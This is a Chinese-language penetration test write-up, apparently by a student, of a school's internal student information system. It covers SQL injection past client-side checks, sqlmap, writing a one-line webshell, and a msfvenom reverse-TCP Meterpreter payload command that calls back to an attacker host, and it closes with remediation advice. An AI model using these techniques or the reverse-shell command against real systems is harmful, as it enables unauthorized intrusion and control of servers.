经过我校信息化管理中心同意,授权我校信息安全协会对内网系统进行渗透测试,那么我这么帅的人怎么可能不去渗透测试一波呢?

端口扫描

在我内网IP段扫描的过程中,发现了一个学生信息采集系统,接下来就是要对这个IP进行端口扫描了

问我为什么内网还要打码?我怕你来我们学校进内网日下来😂

言归正传 扫描端口后发现了很多系统 在不同的端口上运行着

不过我在测试过程中发现了一个学生信息采集系统存在SQL注入漏洞

漏洞测试

由于职业习惯 见到框就想插 呸~ 见到框就想测试一波

没想到还真存在 所以以后挖洞还是要保留职业习惯 不然你觉得没有漏洞 但是漏洞却真实存在 岂不是错过了?

构造SQL注入语句 让它报错 结果给我弹了个这个☹ 不开森

这时候 我们要知道这个判断是否是数字的功能是前端判断的还是后端判断的 其实一般使用js的alert弹窗是前端判断

你问我怎么判断是前端还是后端?很简单 你打开审查元素 看网络请求就行了 如果请求还没发出去就给你弹了个窗那肯定是前端判断的了

既然知道了是前端判断 我们还等什么?抄起我的BurpSuite开始代理抓包

抓到数据包后,将存在SQL注入的字段填入恶意的SQL注入语句,使其报错,如果报错了不就好办了?

结果还真的报错了 SQL注入 稳稳的了

这时候,我的SQLMAP已经按捺不住了 测试存在SQL注入漏洞 是MSSQL数据库

我来康康是不是DBA权限

结果真的让我喜出望外 拿下shell的节奏啊

一看权限 好低 唉 先拿个shell再说吧

我决定用绝对路径写shell的方式写入一个一句话木马

那么就需要知道物理路径 没有怎么办?让页面报错,IIS就会显示路径 嗯 不错🤨

好 现在已经知道了物理路径了 接下来 开始写shell

写入成功了 打开页面也没问题 接下来用我的大天使之剑(蚁剑)连接一句话木马

成功拿到shell 但是权限太低 没啥卵用

查看了一下进程 居然没有杀毒软件和任何WAF 直接用MSF上线吧

先用MSF生成一个windows的64位的木马,具体位数得看操作系统,这个服务器的位数是64位

命令 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.xx.xx.xxx LPORT=5555 -f exe > a.exe 即可生成64位木马,32位木马不加 x64 就ok了

然后再开个MSF去监听 具体的设置看图就ok了

把木马放到 Student 这个目录,貌似只有这个目录可写可读可执行,我也太惨了。。。

使用大天使之剑(蚁剑)终端执行这个文件居然没有上线。。。

我懵逼了 可能是蚁剑的问题吧 我还是换个一句话木马连接工具吧

好了 换了一个一句话木马工具执行之后 成功上线了 注意 我是在内网 嘻嘻 不需要做任何的内网穿透啊 啥的

上线都上线了 接下来当然要提权了 使用MSF的漏洞补丁扫描模块命令 run post/windows/gather/enum_patches

结果 我都试过了 一个都不行 我太惨了 窃取Token令牌的方法 由于没有高权限用户的进程 所以没法弄 提权我没法了 有大佬知道怎么提权 教教我 我太菜了

漏洞修复建议

  1. 前端或者后端严格对用户输入字符进行过滤

  2. 加入web防火墙waf或杀毒软件以免木马随意上传

  3. 数据库权限设为普通用户权限